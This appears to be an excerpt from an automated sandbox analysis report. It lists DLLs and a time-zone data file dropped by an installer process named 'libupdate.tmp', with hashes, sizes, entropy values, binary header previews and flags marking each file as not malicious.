                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1455616
                                                                  Entropy (8bit):7.042640553037248
                                                                  Encrypted:false
                                                                  SSDEEP:24576:pbPzGO1e6lBnWw1VEST8IKH3ql7nbz/jz/zz/Oz/qz/jz/8z/cL/ADDmPdde9OCr:pbtegtXSI0yRKzupMcRc/s+kobXnz/qZ
                                                                  MD5:F731523B0F49C63EAB8836BE4EEDB679
                                                                  SHA1:B09B495CF504552C95FA438219D1D42DE4748DF2
                                                                  SHA-256:742C9C82A8A67374B0D6CCF8E9DD16AC8A5D4D480667C1423454D3B58E853164
                                                                  SHA-512:5C5B3A75D11D7D49462E877B30F8C0D1C5BB5319D8426E7C913FDA28D7E2B837A22CC46C6FB4441AECC9F281B6ED0FABAF690AD24F60FCD8F44D6770359AAD0D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$..........^..^..^......N............G.....{.....O.....H..W.k._..W.l.]..W.|.I..^..|.....R......_..^.x._....._..Rich^...En7..n..o7..nRich6..n................PE..L.....?a...........!......... ......F........0............................................@.........................PS..L....S.......... .......................t....1..8....................2.......1..@............0...............................text............................... ..`.rdata...?...0...@..................@..@.data...ln...p...J...V..............@....rsrc... ...........................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-FE4PN.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):112600
                                                                  Entropy (8bit):6.3103874170339145
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3+M7hhFAHxQCqyT0u3U+PPxFp0tYCAFJtksMRXDh5G0CjwHb9vy6p4V7SpSDvNtW:uIhQRX3F6tLcJ6dRXDh5vPu7Tfza
                                                                  MD5:16FF6202991253FF981A6A7FA20436AA
                                                                  SHA1:F992669261166B099316EA9C6A3B6F16FE86FCD3
                                                                  SHA-256:BD18F22709D63C0156401ACA8E63F0E04490F3348191897B7360511221ADB134
                                                                  SHA-512:5232F55AB7C0630C0A2D43897F10805BCBDA97FAE3A661746C4E70FA9AC5A62AC2D1AC8EDA09E8B5DF6AA24957C43A9BEADAF7CAC26F88EE3AC7E66EEDA1F73D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.........." ..0.................. ........... ...............................^....`.................................h...O........................!..........0................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......(...............................................................^.(0....r...p(1...}....*:.(0.....}....*"..o2...*V.{....,..{.....o3...*^.(0....r?..p(1...}....*.*.0...........r...po4...-......(5...o6...o7...~H...%-.&~G.....k...s8...%.H...(...+o:....+A.o;...o7...~I...%-.&~G.....l...s8...%.I...(...+o=.....{.....o>....o....-....,..o.......&.{.....o>.....*.........L.M.....................#......../.s?...z~.....#...8M%iBZ(@...(A...(B...*..0..6........~....(C...,.s?...z.~...
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-G9BN9.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):71680
                                                                  Entropy (8bit):6.249755448787507
                                                                  Encrypted:false
                                                                  SSDEEP:768:5ONkZWr2iwGZYSK8wHieEbRuzwoQs4HwU4XJPcCqqTPtzY0Xcd6e2XGem3SObDQy:5ONkZqhGHi1uzZGHwlOSs/2fmiOQ
                                                                  MD5:613283CE438722CC027B2F0CAFC910D7
                                                                  SHA1:06D1F1B97A1041A58D55D6EE227DF887511041A5
                                                                  SHA-256:D953E18D73AF16D5B0E2EBC79CBB6F85871DD5CD4EBD45A5B1D54F50AABAAD3E
                                                                  SHA-512:44897BBBA77779A0DCAAABB8B91FC6338320B86A88B10132A1841D35D1605118FC7FFE66B1BEA18813E40B0EE5BFB8942B831C5E52DFB767A2572C204A071112
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#................0.............<p................................1......... ...................... .......0..@............................p..d............................`......................<3...............................text...............................`.P`.data...............................@.`..rdata...$.......&..................@.`@.bss..................................`..edata....... ......................@.0@.idata..@....0......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc..d....p......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-INUKO.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):78848
                                                                  Entropy (8bit):6.246337898053042
                                                                  Encrypted:false
                                                                  SSDEEP:1536:1ISc1+2KuvhLeGwUNHsdvisJy2bmN0+RveV6yG:1e1+so5d6AbB+EV2
                                                                  MD5:8B89A31D5D3F3173F5E3BB9118D04A7E
                                                                  SHA1:B9829C7DF23D7190928041753E2E07069C7ABFEE
                                                                  SHA-256:C5616071D5D2E858BF26CEA64BCDA17B6C494B1507EA96A17816811C6071E4A8
                                                                  SHA-512:67ED465D0AF1E933DEE09C95A3E5945CB33308F0DE21182128F9D19C5AE85ED048B5CEF685B322A6BA4C33830F5844A5EED507B3475017A845391305D872FF12
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#.........0......0..............f.................................?........ ......................0..h....P..................................<............................p......................HR...............................text...d...........................`.P`.data...D...........................@.0..rdata..............................@.`@.bss......... ........................`..edata..h....0......................@.0@.idata.......P......................@.0..CRT....,....`.......&..............@.0..tls.... ....p.......(..............@.0..reloc..<............*..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JAV07.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):63488
                                                                  Entropy (8bit):6.300610257983227
                                                                  Encrypted:false
                                                                  SSDEEP:1536:Opi4OKRmDCqQPlwXVXKXHWRi6H7hubmKvp08k:OpLmDCqQWXVamRLMbpvp08k
                                                                  MD5:49055810FCC813A8E1BDE0A64233F06F
                                                                  SHA1:70F9B4F9668CEDE76B785DD3A1D54146B7F8F68A
                                                                  SHA-256:D1111915F3E27EF605141A56CC5BEDEA25684ED44784DE1213E99F5FE9E5A41E
                                                                  SHA-512:7FCA8D488BC30385011AEAC999943A7BC6BA9E2E15CE83D8CCB77AE72A7C0AF1391D6F7A8966443C31F83C54C10A67722D976E7D69F0D442234264C8856A5C50
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#................0.............Hj.........................`................ .........................:.... ...............................P...............................@.......................!..p............................text...............................`.P`.data...D...........................@.0..rdata..............................@.`@.bss..................................`..edata..:...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.... ....@......................@.0..reloc.......P......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JGRD7.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):71168
                                                                  Entropy (8bit):6.40885208921363
                                                                  Encrypted:false
                                                                  SSDEEP:1536:zJYutTAkscOGfUsditx65XjxqzH6oPA4Ol/mGdiP99bQXFCw3:zJYAJss3d3zxfoIV/bCw3
                                                                  MD5:BC738DA6535B5015E9EABA90F56F8B59
                                                                  SHA1:CE7C7865645A09DCF59DAF519BADE328DDF04B67
                                                                  SHA-256:4EEA44B0B4EA4C248595BB1E573334005EC538792E3BB9D2A07EE01265443327
                                                                  SHA-512:FD2A5C1EB9C5FE4BD2FD87EF912297F463CB623E12D5E9CCF8CC7FCCB39858765E289F4A9102FC02F68B0845048ABB1390DD32AFE2329B143ED331F678C4792B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#................0.............dd................................%......... ......................0..A....@...............................p..X............................`.......................A..p............................text...............................`.P`.data...d...........................@.`..rdata...-..........................@.`@.bss......... ........................`..edata..A....0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc..X....p......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-JNHV3.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):80384
                                                                  Entropy (8bit):6.466525325104407
                                                                  Encrypted:false
                                                                  SSDEEP:1536:iRc06HCdj3uTEv22Ec1eFOCvgxqHm04rgl1ammsUZNIEklJMxb+:iRc0aC13oC1eF7G0MoamzK9klJMxb
                                                                  MD5:87B32E6ED0B33019DDB113DB9EE52B23
                                                                  SHA1:F6661C6150B3AFA8F5603381911B87645F932B44
                                                                  SHA-256:4C99C72663C1944D031D6B4D0AA18C3356E964EF874103CBFAC61589590D742B
                                                                  SHA-512:3D44792B6E556B2AEFD9BD796E092067AF72252AA38B70A7A2294F9718D4519D59C8106C59D2AAF7E08AAF6871FC4B1C306BAD4C7B785E0365405386DA1DD59F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.........6......0..............n.......................................... ......................`.......p..`....................................................................................q..X............................text...............................`.P`.data...D...........................@.0..rdata....... ......................@.`@.bss....(....@........................`..edata.......`......................@.0@.idata..`....p......................@.0..CRT....,............*..............@.0..tls.... ............,..............@.0..reloc..............................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-L7U5I.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):427087
                                                                  Entropy (8bit):6.987040625415913
                                                                  Encrypted:false
                                                                  SSDEEP:6144:vb0yWeeZZHns7Ewj5ls/K6BI/epcxZJB2j5t0UC9Pn14G:vb0yWeeZZHns7EosSBvZJBAtSPn19
                                                                  MD5:21F4B705517AB90E325BD5715910E2BB
                                                                  SHA1:03FA75A46210BDE15BB99C268257B18FDD9E5EE5
                                                                  SHA-256:9B1E3FCEDAB0F186E574E9BA4F1AC423B38739F89062C5C33A7E0AF74D6ABFE3
                                                                  SHA-512:8967A196C5F4B1E8A86BF5B67F3BE352D876738591B97924CC1FE130732399CC2C93EE066EDC142294CAB0536AF65B3CFBBF0EC899C666F051F8681BED49F827
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .<?xml version="1.0" encoding="utf-8"?>..<TimeZoneInfo GeneratedAt="2021-02-08T18:52:30.7353284+05:30">.. <TimeZones>.. <Zone ID="Africa/Algiers">.. <TZI UtcOff="00:12:12" Format="Europe_Central" Rules="" Until="1891-03-15T00:01:00" />.. <TZI UtcOff="00:09:21" Format="Europe_Central" Rules="" Until="1911-03-11T00:00:00" />.. <TZI UtcOff="00:00:00" Format="Europe_Central" Rules="Algeria" Until="1940-02-25T02:00:00" />.. <TZI UtcOff="01:00:00" Format="Europe_Central" Rules="Algeria" Until="1946-10-07T00:00:00" />.. <TZI UtcOff="00:00:00" Format="Europe_Central" Rules="" Until="1956-01-29T00:00:00" />.. <TZI UtcOff="01:00:00" Format="Europe_Central" Rules="" Until="1963-04-14T00:00:00" />.. <TZI UtcOff="00:00:00" Format="Europe_Central" Rules="Algeria" Until="1977-10-21T00:00:00" />.. <TZI UtcOff="01:00:00" Format="Europe_Central" Rules="Algeria" Until="1979-10-26T00:00:00" />.. <TZI UtcOff="00:00:00" Format="Europe_Central" Rules="Algeri
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-LV053.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3227648
                                                                  Entropy (8bit):6.93247781094414
                                                                  Encrypted:false
                                                                  SSDEEP:49152:M05LMVXuj8VdABFDvGjXzGO5Goylo2+ffBCvfLtPSjs68InEbL9ZIQkpqte:M054VVrABFDywoylo2GfCkjs3b
                                                                  MD5:063E873E85BB44068B18FF6AD4A61696
                                                                  SHA1:297EED727AB1B15EDA4EFC0ED751D1E3AE14BDE0
                                                                  SHA-256:C67F7EB39A4A4929A1BEAA8DF258EBDD0FA7D200EE59817AA172E049AB8482C9
                                                                  SHA-512:DC5F855B61A2CBE3152048146FC1C8E6DF8B5DA21C827E5FB8235592232C2D6CD8C50A4271BB9EE1896E26C53C57CC7A7C4B78D65B5B0FE2740BC9955AD1FD93
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........"#.CM..CM..CM..;..CM..6I..CM..6N..CM..6H..CM..6L..CM..6H..CM..6I..CM..(L..CM..%L..CM..CL..BM..*I..CM.[7H..CM..*I..CM..6H.;CM..6M..CM..6...CM..C..CM..6O..CM.Rich.CM.Rich.M(.................PE..L.....?a...........!......#..........G .......#...............................1......./...@...........................-.@...0.-..............................@0..{....,.p.....................,.......,.@.............#..............................text.....#.......#................. ..`.rdata..v.....#.......#.............@..@.data...(.....-.......-.............@....rsrc................<..............@..@.reloc...{...@0..|..../.............@..B........................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-RC38A.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):57856
                                                                  Entropy (8bit):6.295204788467111
                                                                  Encrypted:false
                                                                  SSDEEP:1536:Wztan7pk13bHPH/VDMzp4wpmKBVzOf1JJKDo7wvNyGUC:st29kHVoCwpZBpOf1JJKDo7wvNyJ
                                                                  MD5:40F2B954259FF75979920FA7546C89F0
                                                                  SHA1:C93F6BC6C7F68DD02DCF66C57A71FCF8DDBC35E5
                                                                  SHA-256:460960B7A0A0F5F0A40B33203A46E840AD01E260AFB4540ECD4E6C779D5B041B
                                                                  SHA-512:D992DDD9271422914335DE85F0CB6991F4389F7E2C9A8B4606C435DC30CEEE31671D725EFA4DA397502551D1B45F826692D486612AFE435A51D30B13DACD295D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#................0.............(k.........................`................ .........................>.......t....@..l....................P..d............................0......................`................................text...(...........................`.P`.data...H...........................@.0..rdata...2.......4..................@.`@.bss..................................`..edata..>...........................@.0@.idata..t...........................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc...l....@......................@.0..reloc..d....P......................@.0B................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-RM65K.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):86528
                                                                  Entropy (8bit):6.300346716213912
                                                                  Encrypted:false
                                                                  SSDEEP:1536:7JXErVqLiEb/Zp/Yz6V3JNmODTYaxIHsVn9HIjUmY5e2oC2K9lZ:7JXEBqLiCHAz6V9V9GURe2oC2KTZ
                                                                  MD5:893C149773BFF81B55530820207C73F0
                                                                  SHA1:46C6B5F00B463D31140A0B9972D4BC2B04BA0D0A
                                                                  SHA-256:83F074DBACF3D3DC4C7D5646D056359BB7CB29DCD1A2D109CD07EE21DBDB42AF
                                                                  SHA-512:33F1F08051632756396EE906BCB7285726484EBA1D8C67ECF884A42F824261D9B73BA0BCA52EB8A7D68E7544D79C6FEEA2C98A46C1E0E2CE98E3BBDC3B6B63EA
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#.........N......0............. i.......................................... ......................p..S.......0...................................................................................l................................text...............................`.P`.data...T...........................@.0..rdata...3... ...4..................@.`@.bss.........`........................`..edata..S....p.......,..............@.0@.idata..0............0..............@.0..CRT....,............@..............@.0..tls.... ............B..............@.0..reloc...............D..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-SL01B.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):84992
                                                                  Entropy (8bit):6.265898506164664
                                                                  Encrypted:false
                                                                  SSDEEP:1536:HEbGfT4u4bdi3txtGwY4HmUo5B8NC5Uw4tmfee2K0nXqJUDdsXNSSG3H00StLebU:k6fTTkdi3AwmUo78/tIeeOnXq2sX8SGq
                                                                  MD5:6BA630B7EFB75E1A7BD1DDE921269CAF
                                                                  SHA1:747A70F6AA881371987D17C777A8AC2F9ACD97DF
                                                                  SHA-256:469082F964FEDD6014CF97DE7C30F85D471E6C41248A48A8870657E330D7E36C
                                                                  SHA-512:F401ADB86F6CB3BDEBFF0C6310A2AE7C0B2E59BDFB9EC3C8008A941AE22DEA3EE4D39ECB6D7C7331A8DEDC96E03A8C1C70AC14DCA5C183D509F253755FDFA376
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.........H......0..............e......................................... ......................`..k....p.......................................................................................r..@............................text...T...........................`.P`.data...D...........................@.0..rdata...'... ...(..................@.`@.bss.........P........................`..edata..k....`......."..............@.0@.idata.......p.......(..............@.0..CRT....,............<..............@.0..tls.... ............>..............@.0..reloc...............@..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-SQ21B.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):12800
                                                                  Entropy (8bit):5.677484835794453
                                                                  Encrypted:false
                                                                  SSDEEP:192:vSE+/4gwQJb9fO1cJooUVESTqm8pwa7r75iVsTxeJ:/qRDZkcJxyTMD5DTkJ
                                                                  MD5:638C42B5DD826E709B38FA3F211E5CC4
                                                                  SHA1:4F961E02E1992E47D56991B692FB483B2211B869
                                                                  SHA-256:11EBFAC16CCDF4FE973729E8AE881D4CD30B7CB3DAC15DADD39DA9ED385778EF
                                                                  SHA-512:4F6B8BC353B7F921EE049FF2ADABBADDA6D4517297A484221FA089C8669CA6F0616A4B40C4BAF3A110AB13705BE0797BCA6912F28B94FA078C364404E70FE634
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0b..Q..Q..Q..)..Q...9..Q...9..Q...9..Q...9..Q...9..Q...8..Q..Q...Q...8..Q...8..Q...8..Q...8..Q..Rich.Q..................PE..L...L..^...........!......... ............... ...............................p............@..........................%..0...0+..d....P.......................`.......!...............................!..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........@.......,..............@....rsrc........P......................@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TBC2F.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):75744
                                                                  Entropy (8bit):5.893484095124305
                                                                  Encrypted:false
                                                                  SSDEEP:1536:RgBSJNAJU2aRXJ/qsiDhglwcJ/5I83dxog6qzj:RySJNASrXJ/q1UJ/5Icoghn
                                                                  MD5:E891562A855A6E697559D0D922332BC6
                                                                  SHA1:BF0A7C56494A693D88E043E8CB7B6539C25F3500
                                                                  SHA-256:A4E8833818879BE8F847895C0D69173B8593B319076B865F2E197728451CF197
                                                                  SHA-512:1ED26200B018DD49234ED47703B6589444B587829F0765FBF55ECE0FA4B30B182252D32A2D1DA65F122B7BCFB4467AF01FFFB41F49A0C782E6CA3E4E919ACF3D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......T...........!................~%... ...@....... ....................................@.................................0%..K....@.......................`.......#............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`%......H...........X............f...!..P ......................................w..q.K.(..6.....6Q.."]VbX...W.#.1c[.....C...Kn...u~.J.Wk2'....P.q...?v..4.....j3>.q.o..zN.....d...m...sQ.....#z.._..4f.:.. ...,...o....*2.-..*.o-...*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*J.{.....{....(....*J.{.....{....(....*..{....*~.{.........}.....{....-..(....*..{....*~.{.........}.....{....-..(....*..{....*^.{.........}....
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TILI0.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):51672
                                                                  Entropy (8bit):5.815774561061108
                                                                  Encrypted:false
                                                                  SSDEEP:768:a5zInBstS9qZd0skYYVkkQltb6nE9bljdhtX:a+nBs4qZwlnsblB
                                                                  MD5:8E9CDF436F1F6882E2DD2B3E03B296C2
                                                                  SHA1:B13BB65194A7FC5B9418146D42B2982E7A9839E6
                                                                  SHA-256:2D3DF8DA35FF210B76BA66C9387F375D87407EDFE44A063944236E0F36FFB726
                                                                  SHA-512:7F843451C55B5A2E679516A68B3458FF7390BA06FE8BBDA19717AA452AA139310B1984053EF2537AC5C50DE1D4EF6ED2450DDFC8F70ADB7A0218F1CF3E98119C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.........." ..0.................. ........... ....................................`.................................L...O........................!........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........<...............................................................0..........s......o.....8......(......E....P...............)...6...C...+Y.r...po....+L.r...po....+?.r...po....+2.r...po....+%.r!..po....+..r)..po....+..r1..po......(....:o.............o.....r9..p.(....*..................0.............1...%..,.o....~N...%-.&~M.....Q...s....%.N...(...+~O...%-.&~M.....R...s....%.O...(...+(...+s.....o.....+...( ...(.......o!...-...o".....(#...-...........o......*......j.*...
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-TNQQD.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):49664
                                                                  Entropy (8bit):6.001403729469205
                                                                  Encrypted:false
                                                                  SSDEEP:1536:31Lubc0g1XOg1owXOYZhvSAWV3lgtshWy:l6bcBZOg1owBraTV1g2hWy
                                                                  MD5:23C651B2ACE76D42FEC3989BCBA3CE7B
                                                                  SHA1:378776D20133F20A4C42476BDCB0A408EF1DCE1C
                                                                  SHA-256:1B8410F839283A9483369DACDB22290B065ECE6F00C026D953024666761532E2
                                                                  SHA-512:E47AE720B9EE4388DACFDBF2BA1E2DC546CC01FDB25A6C82CEEEDA03801E449F660E97B3BBB6F65B791BFC1566F21187053472022C6C7C0D68F8CF1187326EC8
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I....................l.......................a...........j...l.......a................n\.....(...............Rich............................PE..L....:.V...........!.....x...H.......}.................................................................................................................................................................................D............................text....v.......x.................. ..`.rdata...(.......*...|..............@..@.data...<...........................@....sxdata.............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libEGL.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):12800
                                                                  Entropy (8bit):5.677484835794453
                                                                  Encrypted:false
                                                                  SSDEEP:192:vSE+/4gwQJb9fO1cJooUVESTqm8pwa7r75iVsTxeJ:/qRDZkcJxyTMD5DTkJ
                                                                  MD5:638C42B5DD826E709B38FA3F211E5CC4
                                                                  SHA1:4F961E02E1992E47D56991B692FB483B2211B869
                                                                  SHA-256:11EBFAC16CCDF4FE973729E8AE881D4CD30B7CB3DAC15DADD39DA9ED385778EF
                                                                  SHA-512:4F6B8BC353B7F921EE049FF2ADABBADDA6D4517297A484221FA089C8669CA6F0616A4B40C4BAF3A110AB13705BE0797BCA6912F28B94FA078C364404E70FE634
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0b..Q..Q..Q..)..Q...9..Q...9..Q...9..Q...9..Q...9..Q...8..Q..Q...Q...8..Q...8..Q...8..Q...8..Q..Rich.Q..................PE..L...L..^...........!......... ............... ...............................p............@..........................%..0...0+..d....P.......................`.......!...............................!..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........@.......,..............@....rsrc........P......................@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libchromaprint.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):80384
                                                                  Entropy (8bit):6.466525325104407
                                                                  Encrypted:false
                                                                  SSDEEP:1536:iRc06HCdj3uTEv22Ec1eFOCvgxqHm04rgl1ammsUZNIEklJMxb+:iRc0aC13oC1eF7G0MoamzK9klJMxb
                                                                  MD5:87B32E6ED0B33019DDB113DB9EE52B23
                                                                  SHA1:F6661C6150B3AFA8F5603381911B87645F932B44
                                                                  SHA-256:4C99C72663C1944D031D6B4D0AA18C3356E964EF874103CBFAC61589590D742B
                                                                  SHA-512:3D44792B6E556B2AEFD9BD796E092067AF72252AA38B70A7A2294F9718D4519D59C8106C59D2AAF7E08AAF6871FC4B1C306BAD4C7B785E0365405386DA1DD59F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.........6......0..............n.......................................... ......................`.......p..`....................................................................................q..X............................text...............................`.P`.data...D...........................@.0..rdata....... ......................@.`@.bss....(....@........................`..edata.......`......................@.0@.idata..`....p......................@.0..CRT....,............*..............@.0..tls.... ............,..............@.0..reloc..............................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\libfaac.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):94720
                                                                  Entropy (8bit):6.2283195662657125
                                                                  Encrypted:false
                                                                  SSDEEP:1536:lJ46GFya7vjnxvoPENgBPIO4qHlCef0vovpg/1H6lbEdozX5mAofEsyQh9:lJkBvjx2Ov1/8lgKb53Rah
                                                                  MD5:4299D8C96853F2210A3E7827AB6A4E80
                                                                  SHA1:3906ABBE7463D5E2DC50CC676E1AE8B51ADCAA06
                                                                  SHA-256:7F79589F36CFB1613ABB2F2338C6177AFD4984F3D6A8E18C08F13561796B3A7D
                                                                  SHA-512:58F86BC1639694499648F07BC3BA7B7B4BF7E95F4A6B3A93B4A1B271D587DF909771C7669CC34BE56098663231BB6B39BD9B17F7D844B9B2D9387A3594C64EF1
                                                                  Malicious:false
                                                                  Reputation:unknown
